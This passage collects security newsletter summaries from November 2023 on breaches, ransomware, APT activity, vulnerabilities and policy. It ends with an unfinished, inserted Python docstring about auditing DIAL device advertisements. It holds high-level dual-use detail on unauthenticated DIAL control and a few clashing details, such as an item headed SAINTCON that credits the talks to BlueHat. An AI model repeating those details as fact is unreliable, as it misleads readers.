EU election cybersecurity exercise: EU agencies held a cybersecurity exercise to test the resilience of election systems. The exercise was meant to prepare EU agencies and officials ahead of EU MP elections that are scheduled to take place in June next year. Participating organizations included the European Parliament's services, ENISA, CERT-EU, and national electoral and cybersecurity authorities.

EU CSA bogged down: Progress on the EU Cyber Solidarity Act has slowed down, and the EU's new cyber legislative effort seems to have gotten bogged down in various commissions. More on the EU CSA is here. [Additional coverage in Euractiv]

IRS getting better at logging: The US IRS is now doing a better job at logging activity on its network, the agency's director of cybersecurity operations, Rick Therrien, said in a webinar earlier this month. [Additional coverage in FederalNewsNetwork]

Russia adds Meta spokesperson to most-wanted list: The Russian government has added Meta spokesperson Andy Stone to the country's most-wanted list. Officials have not revealed why, but an order for his arrest was issued way back in February 2023. The Russian government labeled Meta as a terrorist organization shortly after its invasion of Ukraine after the company refused to censor its content according to the whims of Russian officials. [Additional coverage in the Associated Press]

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Brian Dye, CEO of Corelight, about the value of data from NDR tools when it comes to longer-term incident response.

Cybercrime and threat intel

Nigerian politician connected to Patricia hack: Nigerian police have detained a local politician in connection with the May 2023 hack of local cryptocurrency exchange Patricia. Investigators say $750,000 of the stolen funds were sent to the bank account of Wilfred Bonse, a member of Nigeria's Peoples Democratic Party. Patricia says this sum represents only a small part of the funds it lost in May. The company has yet to disclose the size of the hack. [Additional coverage in TechPoint Africa]

Apple spyware notifications: Apple has sent a team of security experts to India to help the local authorities investigate recent cases of spyware being found on the iPhones of opposition members. At least eight opposition figures spoke out about security alerts they received from Apple at the end of October. Among them was Rahul Gandhi, leader of the National Congress Party and Modi's main rival for the upcoming elections.

New npm malware: Fifty-eight malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.

Telekopye: ESET has published the second part of its report on Telekopye, a Telegram bot for building phishing pages for various Russian online marketplaces. This part focuses on Neanderthals, the Telekopye admin. Part one, an overview of the service itself, is here.

PrivateLoader servers: Embee researchers have identified 12 command and control servers for the PrivateLoader malware operation.

MadCat ransomware: A threat actor known as Plessy and WhiteVendor has been linked to a new ransomware strain named MadCat—per the CERT team for Poland's financial sector [PDF].

MEOW: Sticking with the cat-themed extortion groups, we also have MEOW Leaks, a group that's been operating since September this year. It's unclear if they engage in ransomware attacks or classic data extortion. Their latest victim is the Vanderbilt University Medical Center.

Malware technical reports

Parallax RAT: eSentire looks at Parallax RAT, a remote access trojan launched in 2019 and still used in attacks today, primarily via SERP-poisoned pages.

Tellyouthepass ransomware: Chinese security firm Sangfor has published an analysis of the Tellyouthepass ransomware after several Chinese companies got hit over the past weeks.

Sponsor Section

This week's Risky Business newsletters are brought to you by Corelight. They maintain the open-source Zeek network security sensor/monitor. They also make very good commercial products in the network security space. Check them out at Corelight.com, or watch this video about why you need NDR as well as EDR.

APTs, cyber-espionage, and info-ops

Chimera's NXP hack: Chinese state-sponsored hackers have breached the network of Dutch chipmaker NXP in an attempt to steal chip designs. The intrusion lasted from October 2017 to the start of 2020 and was carried out by a group known as Chimera. NXP told Dutch newspaper NRC the group managed to steal some intellectual property but did not elaborate. NRC says the group also breached Dutch airline Transavia and seven Taiwanese chipmakers in subsequent operations. [Additional coverage in NRC/non-paywalled]

XDSpy: Russian security firm FACCT says the XDSpy APT group has targeted Russian companies in the metallurgy and military-industrial sectors. XDSpy is an APT discovered in 2020 that has historically targeted Russian organizations only. A past campaign targeted Russian private companies and a well-known research institute.

APT37: South Korean security researcher Sakai has published an analysis of a recent APT37 (Reaper) spear-phishing campaign targeting South Korean organizations.

DoNoT Team: Qihoo 360 looks at a recent campaign carried out by the DoNoT APT group, also known as APT-C-35. The final payload was a mundane, run-of-the-mill Remcos RAT.

Hamas APT op: Check Point analyzes recent versions of the SysJocker multi-platform backdoor, which the company has spotted in some Hamas APT operations linked to the Gaza Cybergang.

"Among the most prominent changes is the shift to Rust language, which indicates the malware code was entirely rewritten while still maintaining similar functionalities. In addition, the threat actor moved to using OneDrive instead of Google Drive to store dynamic C2 (command and control server) URLs."

Syrian Army targeted: Chinese security firm QiAnXin has published a report on a spear-phishing campaign targeting Syrian Army soldiers. The final payload is the SpyMax Android RAT.

Vulnerabilities, security research, and bug bounty

Synology security updates: NAS vendor Synology has patched the bugs used during the Pwn2Own Toronto 2023 hacking contest that took place last month.

ownCloud security updates: File-sharing and synchronization solution ownCloud has released three security updates for its on-premise solution. All vulnerabilities are rated critical, with severity scores of 9, 9.8, and 10. The most dangerous of these bugs is a vulnerability that can be used to leak ownCloud admin passwords and mail server credentials via the ownCloud Graph API.

strongSwan RCE: A remote code execution vulnerability (CVE-2023-41913) has been patched in the strongSwan VPN solution.

Windows micro-patch: Acros Security has released a micro-patch for a new NTLM relay technique disclosed by Check Point earlier this month.

C2PA forgeries: Dr. Neal Krawetz looks at various ways of creating authenticated forgeries for multimedia files secured with C2PA, a multimedia signing and authentication standard developed by Adobe, Arm, Intel, Microsoft, and Truepic.

Infosec industry

New tool—AD Canaries: The Airbus security team has open-sourced AD Canaries, a canary solution for Windows AD environments.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how being more open about cybersecurity threats is great for marketing and has also forced cybersecurity companies to pick sides and make value judgements.

Risky Biz News: Fastly to block domain fronting in 2024

24 November 2023 at 00:30

This newsletter is brought to you by Yubico. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

Internet infrastructure company Fastly will block domain fronting on its cloud platform from February 27, 2024.

Fastly now joins a growing list of major cloud companies that have banned domain fronting. The list includes Amazon (banned in 2018), Google (2018), Microsoft (2022), and Cloudflare (2015).

Domain fronting is a technique that uses one domain name in the outer, visible layer of an HTTPS connection and a different domain name in the encrypted request carried inside it.

The technique became popular in the early 2010s in the mobile app development ecosystem, where developers would configure their apps to connect to a "front" domain that would then forward the connections to the developer's backend. This way, the developer could expand their backend to deal with growing traffic and new features without constantly having to release app updates.

Since then, the technique has expanded and has been adopted by online services like Tor, Telegram, and Signal to bypass internet censorship attempts in oppressive countries. The Tor Project maintains a list of CDN providers and their support for domain fronting, a core feature that allows its users to find and connect to new relays.

Because of its ability to hide backend infrastructure, domain fronting has also become popular with malware operations, being adopted by both financially and espionage-motivated groups.

Fastly began notifying customers about its intention to stop supporting domain fronting at the end of October.

Two weeks later, Microsoft notified Azure customers that it was tightening the screws on its 2018 domain fronting block. Customers who were grandfathered in under the 2018 block will have to make additional changes to their server infrastructure by January 8, 2024.

Back in 2018, when both Amazon and Google blocked domain fronting on their platforms, everyone suspected the Russian government was putting pressure on the two companies. At the time, the Russian government blocked 1.8 million AWS and Google Cloud IP addresses in an attempt to block access to Telegram's instant messenger.

Lower in today's edition of this newsletter, you'll find an entry on how 21 anti-censorship tools maintained by Chinese developers and meant to bypass China's Great Firewall were removed at the same time from GitHub—all on November 2 and 3.

Prior to that, the Chinese government also ordered that any online account with more than 500,000 followers must share their real name. The government pressured seven of the major Chinese social media platforms to abide by this rule in an attempt to prevent the subversion of its power and influence in cyberspace.

With the proximity of all these announcements, one might wonder if the Chinese government might have applied some pressure. Sadly, we cannot answer this, although things are not as dire as they look.

An academic study published in October this year found that 22 out of 30 tested CDN providers still support/allow domain fronting in some form or another, including major providers like Akamai, CDN77, and Lumen.


Breaches, hacks, and security incidents

Pegasus in Serbia: Traces of the Pegasus spyware have been found on the smartphones of two members of Serbian civil society. The victims learned of the infection at the end of October after receiving a notification from Apple. The SHARE Foundation says it will not name the victims to protect their identities, but it will work with Access Now and Amnesty International to investigate the hacks.

Fidelity National Financial: Insurance company Fidelity National Financial has shut down some of its IT systems in the aftermath of a major cyberattack. The Florida-based company disclosed the incident a day before the Thanksgiving US holiday, shortly after the intrusion took place. As soon as it was made public, the AlphV ransomware operation took credit for the intrusion. Fidelity National Financial is the largest title insurance company in the US, and the incident is preventing the closure of some real estate transactions. [Additional coverage in RealEstateNews]

Blender DDoS attacks: Some psychopath is DDoSing the website of Blender, an open-source 3D design application. Blender says the attack peaked at over 28Mrps, which is quite the number. I've seen some weird DDoS attacks, but... Blender!?! Really!?!

General tech and privacy

GFW anti-censorship tools are disappearing: At least 21 tools meant to bypass China's Great Firewall and other state censorship tools have been removed from GitHub. All the tools were maintained by Chinese developers and were removed on November 2 and 3, showing some level of coordination either from the developers or from authorities. Western privacy experts believe the Chinese government managed to deanonymize and pressure the developers into removing the tools. The move comes as China cracks down on internet anonymity. Earlier this month, the Chinese government ordered that any online account with more than 500,000 followers must share their real name. [Additional coverage in TechCrunch]

Twitter misinformation: NewsGuard has published a report detailing how ads from 86 major advertisers appeared next to tweets promoting "some of the most egregious false or misleading claims about the [Israel-Hamas] war."

Firefox 120: Mozilla has released Firefox 120. New features and security fixes are included. The biggest changes in this release are the ability to copy URLs without site tracking parameters and a limited test (in Germany) to automatically block those annoying cookie banners.

Government, politics, and policy

Australian Cyber Security Strategy: The Australian government has published its Cyber Security Strategy for the 2023-2030 period. The plan describes a government-wide effort to improve the country's cybersecurity posture. Major points include the introduction of a no-fault, no-liability ransomware reporting requirement and a possible ban on some ransom payments. It also plans to set up "cyber rapid assistance" teams to help Pacific island nations respond to cyber attacks. The government has allocated AUS$586 million for the strategy's implementation. [Additional coverage in ABC]

New US Navy cyber strategy: On the same topic, but on a much smaller scale, the US Navy has also released its cyber strategy. This is the first time the Navy has put together and released such a document. [Additional coverage in DefenseScoop]

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Derek Hanson, Yubico VP of Solutions Architecture and Alliances, about the state of authentication and what Passkeys are all about.

Cybercrime and threat intel

Killnet leader dox: In a surprising turn of events, a regime-controlled news outlet has doxed and revealed the real-world identity of Killmilk, the leader of the infamous pro-Kremlin hacktivist group Killnet. According to Russian news outlet Gazeta, Killmilk is a 30-year-old named Nikolai Nikolaevich Serafimov. The news outlet says it learned of Killmilk's identity from two Russian hacktivist groups and later confirmed the dox with a source in Russian law enforcement. This is quite an interesting turn of events!

RMM abuse: Huntress Labs' Q3 threat report is out, and the company highlights the rise in abuse of legitimate remote monitoring and management (RMM) software by threat actors in post-intrusion activity.

Malware technical reports

ParaSiteSnatcher: Trend Micro looks at ParaSiteSnatcher, a framework used by threat actors to create malicious Chrome extensions to monitor and steal data from user browsers. Trend Micro says the framework has been used in the wild to create Chrome extensions that target Brazilian users.

InfectedSlurs botnet: A new Mirai-based botnet is exploiting two unpatched zero-days to take over smart IoT devices and carry out DDoS attacks. Named InfectedSlurs, the botnet began operating in late 2022, but its activity ramped up in October this year after the addition of the two zero-days. The two zero-days impact router and network video recorder (NVR) models. Security firm Akamai says it won't reveal the vendor and model names until patches are available—in order to prevent additional exploitation.

WSO-NG: Akamai has published a technical write-up of WSO-NG, a pretty common web shell family that's been around for almost 14 years.

Lu0bot: Trend Micro looks at a recent infection with the Lu0bot malware.

IPStorm: Security researcher Ian French has published an analysis of the IPStorm proxy malware, whose botnet was taken down by US officials this year.

DarkGate: Trellix has published a report on the evolution of the DarkGate loader, a malware strain that appears set to replace QakBot in the hearts of most malware operators. A similar report on DarkGate is also available from Sekoia.

WailingCrab: IBM X-Force has published an analysis of WailingCrab, a malware loader strain also known as WikiLoader. The report covers recent malware updates relating to its C2 communication mechanisms, which include support for MQTT connections.

Vidar servers: A Censys scan of the internet has discovered the IP addresses of 22 command and control servers used by the Vidar infostealer.

Atomic Stealer: Malwarebytes is seeing malvertising campaigns push fake browser updates infected with AMOS, aka Atomic Stealer, a macOS-centric infostealer.

MetaStealer: eSentire researcher RussianPanda has published an analysis of MetaStealer. The infostealer launched in March 2022 and incorporates a lot of code from Redline Stealer, as its creator candidly admitted back then. The malware is different from the MetaStealer that SentinelOne discovered earlier this year, which is written in Go and targets macOS exclusively.

Sponsor Section

Brought to you by Yubico, the inventor of the YubiKey, a security key that provides the gold standard for multi-factor authentication (MFA) and stops account takeovers in their tracks. Find them at yubico.com.

APTs, cyber-espionage, and info-ops

HrServ: Kaspersky researchers have discovered a new web shell named HrServ that has been secretly installed on hacked Microsoft Exchange servers across the world. The malware can hide and execute in a server's memory and appears to have been in use since 2021. Kaspersky says the only victim it managed to identify based on its telemetry is a government organization in Afghanistan. The security firm described the malware as sophisticated and believes it to be the work of an APT group.

Another DPRK supply chain attack: A North Korean hacking group has carried out a supply chain attack using the infrastructure of CyberLink, a Taiwanese company that develops multimedia software products. Tracked as Diamond Sleet (Zinc, Temp.Hermit, Labyrinth Chollima), the group hid the LambLoad malware in the company's legitimate applications. The incident took place at the end of October and had limited impact. Microsoft says the malicious activity only impacted around 100 devices across the world, with most victims in Japan, Taiwan, Canada, and the US.

Kimsuky alert: The South Korean National Police Agency (KNPA) has published a security alert warning of a Kimsuky spear-phishing campaign impersonating government and news media organizations. More than 1,400 users have received emails so far, according to officials.

Russian disinfo: Israeli news site Haaretz has found a cluster of Kremlin-run accounts pushing disinformation about the Israel-Hamas war. The campaign included antisemitic graffiti painted by foreign actors in Paris and fake news stories in various languages.

Vulnerabilities, security research, and bug bounty

Windows Hello bypass: Security researchers from Blackwing Intelligence have bypassed Windows Hello fingerprint authentication on Dell Inspiron, Lenovo ThinkPad, and Microsoft Surface Pro laptops. The researchers targeted the Secure Device Connection Protocol (SDCP) and how device manufacturers implemented the protocol. Blackwing says that while Microsoft did a "good job" at designing some parts of the SDCP, two of the vendors they tested didn't even enable it. The research was sponsored by Microsoft's MORSE security team and aimed to test the security of the top three fingerprint sensors used for Windows Hello authentication.

InfStones vulnerability: Blockchain security firm dWallet Labs has disclosed a vulnerability in blockchain infrastructure provided by InfStones. According to dWallet Labs, an attacker who exploits the vulnerability can take over servers and extract the private keys of validators hosted on InfStones infrastructure. Researchers say the vulnerability impacts transaction validators for different blockchains, such as ETH, BNB, SUI, APT, and others.

WordPress admin password reset bug: Wordfence has discovered a vulnerability in the UserPro WordPress plugin that can let attackers reset an admin account's password.

ActiveMQ vulnerability: PRIOn security researchers have published an analysis of CVE-2023-46604, an actively exploited vulnerability in Apache ActiveMQ servers.

OpenCMS vulnerabilities: watchTowr Labs has published a write-up on four vulnerabilities in the OpenCMS platform that got patched at the end of October.

Kubernetes security updates: The Kubernetes project has released a security update to fix a privilege escalation on Container-Optimized OS and Ubuntu nodes.

Atlassian security updates: Atlassian has released 22 security updates.

NCSC challenge coins: The UK NCSC plans to provide special challenge coins (pictured below) to the top security researchers who reported vulnerabilities in UK government sites via the NCSC's bug bounty program.

Infosec industry

SAINTCON 2023 videos: Talks from the BlueHat 2023 security conference, which took place in October, are available on YouTube.

Buggy Fortinet alerts: Fortinet alerts for its monthly security updates are not DMARC-signed and are getting sent to spam folders. Someone at Fortinet might wanna look into that.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how being more open about cybersecurity threats is great for marketing and has also forced cybersecurity companies to pick sides and make value judgements.

Risky Biz News: Tor Project removes 1k relays linked to cryptocurrency scheme

22 November 2023 at 00:30

This newsletter is brought to you by Yubico. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Spotify:

The Tor Project has removed an estimated 1,000 relay servers from its network, citing their involvement with a for-profit cryptocurrency scheme.

The scheme allegedly promised cryptocurrency tokens for users who set up and ran Tor relays.

In a blog post on Monday, Tor admins said they removed participating servers to protect the integrity and reputation of their project. The removal was subject to a community vote that passed last week.

While the number of removed servers was not disclosed, metrics for the Tor network show a drop of almost 1,000 active relays over the past week.

The Tor Project expressed its disapproval of the scheme and warned relay operators of the danger such schemes pose to both node operators and their users.

The project said it had worked on its own in-house monetization schemes in the past to help support its operations and operators, but none have offered an adequate level of protection so far.

The Tor Project did not provide details about the cryptocurrency scheme, but it was most likely referring to the ATOR cryptocurrency project that launched at the end of September. The ATOR token lost 58% of its value after the Tor Project's announcement.

Over the years, the Tor Project has been on a quest to diversify its revenue streams, which have been historically tied to the US Department of Defense.

The project's main financial success has been to reduce the percentage of US government funding from 85% in 2015 to around 50%, a figure Tor has hovered around since 2018, going as low as 38% in 2021.

This year, in a financial report released last week, the Tor Project reported that 53% of its funding in fiscal year 2021-2022 came from the US government, a figure larger than usual after a significant fall in user donations last year.

Breaches, hacks, and security incidents

NTT leak: A former employee of Japanese telco NTT stole and leaked the personal information of 9 million of the company's customers. The employee took the data from an NTT call center server and sold it to local data brokers. The theft took place in April 2022 and remained undetected until July this year, when Japanese police discovered the data as part of its investigations. NTT confirmed the breach in October and blamed it on one of its telemarketing operators. [Additional coverage in The Asahi Shimbun]

AutoZone in the MOVEit zone: Auto parts retail chain AutoZone says the data of almost 185,000 customers was stolen in a cyberattack at the end of May. The data was stolen by the Clop cybercrime group as part of its attacks that targeted MOVEit file-sharing servers. More than 2,600 companies across the world have been impacted by the MOVEit hacks, and the data of 77 million users was stolen in the intrusions.

Call for no more ransom payments: The CEOs of five Canadian hospitals that have been hacked by ransomware gangs are calling for the government to pass a formal ban on ransom payments. The hospital execs are urging the government to follow through on its promise made during the recent International Counter Ransomware summit. Canada and 49 other countries pledged to stop paying ransoms to hackers as a way to cut off their funding. The five CEOs manage five hospitals in the Ontario region that got hit by ransomware at the end of October and decided not to pay to avoid "feeding the monster." [Additional coverage in iHeartRadio] [h/t Brett Callow]

Russian pilot hack: Pro-Ukrainian hacktivist group Cyber Resistance has hacked and leaked data from the email account of a Russian pilot employed by Aviacon Zitotrans, a sanctioned Russian airline. The leaked emails allegedly show how Russian airlines are secretly moving weapons, ammunition, and sanctioned goods from Iran, South Africa, and Mali to Russia. In some cases, the transports are disguised as "humanitarian aid," the group says. The Cyber Resistance group has a history of hacking and exposing Russian operations. They previously doxxed Russian pilots who bombed civilian infrastructure in Ukraine, doxxed the leader of the APT28 cyber-espionage group, and exposed Russia's efforts to recruit Cuban mercenaries. [Additional coverage in InformNapalm]

General tech and privacy

Nothing Chats fiasco: Tech company Nothing has pulled its Nothing Chats instant messaging app from the Google Play Store a day after its launch. Advertised as an E2EE messenger that brings support for iMessage on Android devices, the app was pulled after security researchers discovered egregious privacy issues. Researchers found the app was logging into users' accounts on their behalf and redirecting and logging all messages through its own servers. They also found the app was using HTTP for many of its most sensitive requests. [Additional coverage in The Verge]

Twitter FTC investigation: The FTC is investigating Twitter for running unlabeled ads on its platform. [Additional coverage in TechCrunch]

YouTube intentionally slows down traffic: Google is intentionally slowing down YouTube page loads for browser users who use an ad-blocker. The delay is not present for Chrome users with an ad-blocker but only for other browsers that use an ad-blocker. Totally not monopolistic behavior. Nope. You're seeing things! [Additional coverage in Android Authority]

FreeBSD 14: Version 14.0 of the FreeBSD operating system is out.

Government, politics, and policy

Ukraine sacks cybersecurity officials: The Ukrainian government has fired two cybersecurity officials amid an investigation into alleged embezzlement. Yurii Shchyhol and Victor Zhora were accused of participating in a scheme to contract software at inflated prices. The two served as the head and deputy of the State Service of Special Communications and Information Protection of Ukraine (SSSCIP). Four other suspects are also under investigation. The group is accused of embezzling $1.7 million from government contracts. [Additional coverage in Cyberscoop]

Europol OSINT task force: Europol has set up a special OSINT task force that will support investigations into war crimes committed in the Russian-Ukrainian war.

Poland to investigate Pegasus cases: The newly elected Polish government will establish a special commission next week to investigate the former government's use of the Pegasus spyware. The commission will look at how the former ruling party PiS used Pegasus to spy on opposition members, journalists, and prosecutors. Reuters reported at the end of October that the government was looking at establishing the commission. [Additional coverage in PAP] [h/t Eva Infeld]

Australia's Cyber Health Check Program: The Australian government is setting up a voluntary cyber health check program for small and medium businesses. The program will allow SMBs to take a free security assessment and access training materials to upskill their employees. SMBs with a higher risk of being targeted by hackers will be able to request a more sophisticated, third-party security assessment. The Australian government is putting $7.2 million into the new program. [Additional coverage in The Canberra Times]

Hemisphere program: US Senator Ron Wyden (D-Ore) has asked the Justice Department to release information about its secret Hemisphere phone surveillance program. The program allows US law enforcement agencies to request searches of US phone records without warrants. The searches are run against an AT&T database of phone records going as far back as 1987. AT&T is allegedly getting paid to provide access to the database and run the Hemisphere platform. The program is not classified, but the DOJ has marked it as "Law Enforcement Sensitive." Sen. Wyden is now asking the DOJ to remove the classification and release Hemisphere documents to the public. [Additional coverage in Wired]

DOD info-op strategy: The US Department of Defense has published its strategy for information operations. On the same note, the US Air Force cyber command also announced plans to devote more time to training airmen in information warfare.

US-ID cyber agreement: The US and Indonesia have signed a defense agreement that includes a significant focus on cyber and space capabilities. [Additional coverage in DefenseOne]

CISA pilot program: CISA has launched a pilot program that will provide what the agency describes as "cutting-edge cybersecurity shared services" to selected US critical sector organizations. The pilot program launched in October with its first phase, with participants from the healthcare, water, and K-12 education sectors. CISA Executive Assistant Director for Cybersecurity Eric Goldstein says the agency plans to enroll up to 100 entities by the end of the year. [Additional coverage in The Record]

GridEx VII: Over 250 organizations take part in GridEx VII, a biennial exercise focusing on the security of the electrical grid in the United States and Canada. [Additional coverage in SecurityWeek]

ICO cookie crackdown: UK privacy watchdog ICO has warned organizations about an impending crackdown if they don't simplify their cookie banners. The agency had previously requested that websites provide an easy way to reject all advertising cookies. The ICO has given the largest visited sites in the UK 30 days to comply with its new rules or face punishment.

IoC RFC: The UK's cybersecurity agency—the NCSC—has filed a formal document with the Internet Engineering Task Force looking to standardize IoC formats. Also known as Indicators of Compromise, IoCs are used by cybersecurity tools and professionals to detect malicious activity and can take the form of domain names, IP addresses, or hashes. The NCSC says the new document introduces a common format for sharing and using IoCs to improve interoperability between different vendors. The agency says it's been working on the IoC standard for the past three years. The IETF has assigned RFC9424 for the proposed standard, which is now entering a public comments period before a voting process.

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Derek Hanson, Yubico VP of Solutions Architecture and Alliances, about the state of authentication and what Passkeys are all about.

Cybercrime and threat intel

Cryptocurrency seizure: The US Department of Justice has seized almost $9 million worth of Tether cryptocurrency from a cybercriminal organization. The DOJ says the group obtained the money after exploiting over 70 victims through romance scams and cryptocurrency confidence scams. Officials did not name or charge any of the group's members.

DraftKings hacker pleads guilty: A 19-year-old from Wisconsin has pleaded guilty to hacking-related charges in connection to a credential-stuffing attack against sports betting website DraftKings. Joseph Garrison admitted to successfully breaching more than 60,000 DraftKings accounts in an attack in November 2022. Officials say Garrison sold access to some accounts online and also stole $600,000 from around 1,600 of the site's users. Garrison is scheduled for sentencing in January 2024.

LockBit has new ransom negotiation rules: The LockBit ransomware operation has announced new rules for its affiliates during the ransom negotiation process. The new rules entered into effect at the start of October. LockBit admins imposed the rules after they saw affiliates requesting small ransoms from victims and giving out generous discounts. According to researchers at Analyst1, affiliates will now be forced to use a tiered percentage-based system for ransom fees, depending on the victim's annual revenue (see below). Affiliates are now also banned from offering discounts greater than 50% of the initial ransom demand.

  • companies with revenue up to $100 million pay from 3% to 10%

  • companies with revenue up to $1 billion pay from 0.5% to 5%

  • companies with revenue of more than $1 billion pay from 0.1% to 3%

vx-underground ransomware: The Phobos RaaS has created a version of their ransomware that poses as vx-underground, a well-known threat intelligence sharing group.

Play goes RaaS: Security firm Adlumin says it found evidence that the Play ransomware gang is now advertising access to its malware via a Ransomware-as-a-Service model.

INC ransomware: Cybereason has published a threat alert on INC, a new ransomware operation that surfaced in August this year.

"All known victims are exclusively from Western countries with the majority of them from the United States and Europe (a single victim was from Singapore)."

Linux-v-Windows ransomware: Check Point has published a comparative look at the Linux and Windows ransomware scenes, and how ransomware gangs/strains operate on each platform.

Android bankers in India: Microsoft's threat intel team has published a technical report about the tactics of various cybercrime gangs that use socially-engineered SMS, Telegram, or WhatsApp messages to get victims to install malware-laced Android apps on their devices. The final payload is typically one of the new-age hybrid info-stealing RAT strains that have been growing in popularity in recent years.

Kubernetes leaks: Aqua Security says it found Kubernetes secrets of hundreds of organizations and open-source projects exposed on the internet. 

"Among the companies were SAP's Artifacts management system with over 95 million, two top blockchain companies, and various other Fortune-500 companies. These encoded Kubernetes configuration secrets were uploaded to public repositories."

Hydra dark web market analysis: A team of US academics has published a detailed analysis of Hydra, the largest dark web marketplace seen so far. The research comes with this interesting table showing annual revenue estimates for the largest dark web markets of the last decade.

Malware technical reports

NetSupport RAT: Threat actors have repurposed the NetSupport Manager legitimate app into a fully-fledged remote access trojan, currently tracked as NetSupport RAT.

Agent Tesla: A new variant of the Agent Tesla infostealer has been spotted in the wild.

SolarMarker: eSentire researchers have published an analysis of SolarMarker, a .NET infostealer also known as Jupyter.

LummaC2 Stealer: Security firm Outpost24 has found a version of the LummaC2 Stealer that uses an extremely clever way of detecting sandbox environments. The malware records mouse cursor positions and then uses trigonometry functions to detect if the cursor movement is the result of natural human interaction or if the mouse was moved using pre-determined algorithms, typically used by sandboxed environments.

Kinsing: Trend Micro has seen the Kinsing crypto-mining botnet exploit Apache ActiveMQ servers using the recently patched CVE-2023-46604 vulnerability to install their crypto-mining bot.

Crypto-miner: AhnLab looks at a crypto-mining campaign targeting Windows systems running Apache web servers.

XWorm: ANY.RUN researchers have published a deep dive into the C2 protocol of the XWorm malware.

DarkGate: Sekoia researchers have published an analysis of the DarkGate loader, advertised as a go-to replacement for the now defunct QakBot malware—disrupted by the FBI earlier this year.

"After examining the various DarkGate stages (the AutoIT script, its shellcode and also its core), it becomes evident that DarkGate represents a significant threat. Consequently, it is imperative to maintain continuous tracking and monitoring of DarkGate in both the short and long term."

Sponsor Section

Brought to you by Yubico, the inventor of the YubiKey, a security key that provides the gold standard for multi-factor authentication (MFA) and stops account takeovers in their tracks. Find them at yubico.com

APTs, cyber-espionage, and info-ops

Andariel: Security researchers at AhnLab say the Andariel North Korean hacking group is targeting South Korean organizations through a local asset management program. Hackers are using vulnerabilities in the software to deploy malware on victims' internal networks. AhnLab did not name the vendor. The same group was also seen targeting MSSQL database servers.

Konni: Fortinet's security team looks at a recent Konni campaign targeting Russian entities with malicious Word documents.

North Korean campaigns: PAN's Unit42 has found two job-themed social engineering campaigns that bear the hallmarks of your typical DPRK operation. Unit42 named the campaigns Contagious Interview and Wagemole. Per Unit42, "activity from both campaigns remains an ongoing active threat."

Vulnerabilities, security research, and bug bounty

CitrixBleed reminder: Citrix has published a blog post to remind owners of NetScaler and ADC appliances to not only update the software but also wipe past user sessions. This step is necessary because threat actors who exploit the CitrixBleed vulnerability steal authentication tokens that they can use later, after the device has been patched. A day after the company's blog post, CISA and the FBI also released a security advisory on how the LockBit ransomware gang is exploiting the CitrixBleed vulnerability. The advisory contained IOCs shared by Boeing, one of the LockBit gang's recent victims.

"This CSA provides TTPs and IOCs obtained from FBI, ACSC, and voluntarily shared by Boeing. Boeing observed LockBit 3.0 affiliates exploiting CVE-2023-4966, to obtain initial access to Boeing Distribution Inc., its parts and distribution business that maintains a separate environment. Other trusted third parties have observed similar activity impacting their organization."

Kubernetes security updates: The Kubernetes project has released a security update to fix a privilege escalation on Container-Optimized OS and Ubuntu nodes.

WithSecure Elements vulnerability: Baldur researchers have discovered a DoS vulnerability in the WithSecure Elements cloud-based security solution.

MSFT bug bounty program: Microsoft has awarded more than $63 million in rewards to the security researchers who participated in its bug bounty program over the past decade. Launched in 2013, the Microsoft bug bounty program has turned ten years old this year. Microsoft says the program has grown from less than 100 bug reports in its first year to include 22 different bug bounty programs for various Microsoft platforms, with thousands of submissions each year. The latest of these programs is the Microsoft Defender Bounty Program, which the company launched this week. The program will provide rewards of up to $20,000 for vulnerabilities in the Microsoft Defender line of products. 

Infosec industry

SAINTCON 2023 videos: Talks from the SAINTCON 2023 security conference, which took place in October, are available on YouTube.

Retaliation at work: A recent Engprax survey of almost 2,000 software engineers found that 53% of respondents witnessed or suspected wrongdoing in their workplace. Of those who spoke up, 75% reported facing retaliation after they reported wrongdoing to their employers. Those who didn't report anything cited fear of retaliation as the primary reason.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how being more open about cybersecurity threats is great for marketing and has also forced cybersecurity companies to pick sides and make value judgements.

Risky Biz News: DIALStranger vulnerabilities disclosed after four years

20 November 2023 at 00:30

This newsletter is brought to you by Yubico. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

Turkish security researcher Yunus Çadirci has discovered vulnerabilities in the DIAL protocol and misconfigurations in vendor equipment that can be used to force TVs and other capable devices to play an attacker's video content.

The vulnerabilities have been collectively named DIALStranger, and details about the flaws were disclosed for the first time at the Black Hat Middle East and Africa security conference last week.

The DIALStranger flaws were discovered way back in 2019, but Çadirci kept the original report private for four years as the protocol received patches and vendors slowly updated devices.

The flaws impact Discovery and Launch—or DIAL—a protocol primarily co-developed by Netflix and YouTube, with help from Sony and Samsung.

It's a protocol that merges SSDP, UPnP, and HTTP. It is designed to operate on local subnets to allow devices to discover each other. Its primary audience is multimedia device vendors, as DIAL can allow "second screen" devices, such as a smartphone or tablet, to send and play content on "first screen" devices, such as a smart TV, set-top box, or PC.

Back in 2019, Çadirci says he discovered that the DIAL protocol did not have any kind of authentication or strong security mechanisms put in place.

He found that "first screen" devices were exposing a web server URL where "second screen" devices could send playback instructions.

If the "first screen" device was exposed on the internet, anyone could send commands to these endpoints and play any video stream they wanted without any sort of authentication or pairing needed.

At the time, Çadirci says he found "thousands of devices connected to [the] Internet directly that can be controlled by attackers" and that some attacks on devices in local networks were also possible.
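The discovery flow described above (SSDP M-SEARCH answered with a LOCATION URL, whose device description carries the Application-URL that second-screen devices then talk to) is simple enough to audit offline. The following is an added example, not Çadirci's scanning script: it parses constructed SSDP and device-description responses, confirms the advertised service is DIAL, and reports whether the control endpoint sits on a local subnet, which is where the protocol was designed to live. The sample messages and their addresses are constructed for the demonstration.

```python
"""Offline audit helper for DIAL (Discovery and Launch) advertisements.

DIAL discovery: a second-screen device sends an SSDP M-SEARCH with
ST: urn:dial-multiscreen-org:service:dial:1. A first-screen device answers
with an HTTP-style response whose LOCATION header points at its UPnP device
description; that description's Application-URL header is the REST base that
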